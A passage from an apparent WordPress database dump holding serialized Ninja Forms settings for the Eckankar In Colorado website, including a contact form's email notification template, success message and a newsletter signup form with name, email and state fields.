end.\";}s:2:\"id\";i:78;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:49\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:79;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:49\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:32:\"Parker Initiators and ESAâs\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3891:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Parker Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Parker ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_166}Â {field:lastname_167} </span>has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_166}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_167}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_168}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_169}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_170}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166807240}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_174}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:80;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:26:\"Parker Initiators and ESAs\";s:10:\"created_at\";s:19:\"2019-07-15 14:07:08\";s:10:\"form_title\";s:32:\"Parker Initiators and ESAâs\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 17:48:44\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:8:\"html_165\";i:1;s:11:\"textbox_166\";i:2;s:12:\"lastname_167\";i:3;s:9:\"email_168\";i:4;s:9:\"phone_169\";i:5;s:14:\"listselect_170\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166807240\";i:7;s:12:\"textarea_174\";i:8;s:18:\"html_1663800618371\";i:9;s:10:\"submit_176\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(21,'a:7:{s:2:\"id\";i:21;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:243:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - Newsletter Signup</span></span></span></strong></span></h3>\r\nGet the latest news from around the state!\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:287:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - Newsletter Signup</span></span></span></strong></span></h3><p> <span style=\"font-size: 18px;\">Get the latest news from around the state!</span></p>\";s:3:\"key\";s:8:\"html_306\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_306\";}s:2:\"id\";i:223;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_307\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:15:\"one-third first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_307\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:224;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_308\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_308\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:225;}i:3;a:2:{s:8:\"settings\";a:49:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_309\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_309\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:226;}i:4;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:6:\"def_id\";s:2:\"11\";s:5:\"label\";s:5:\"State\";s:9:\"label_pos\";s:5:\"above\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:9:\"list_type\";s:8:\"dropdown\";s:10:\"user_state\";s:1:\"1\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"populate_term\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:51:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra 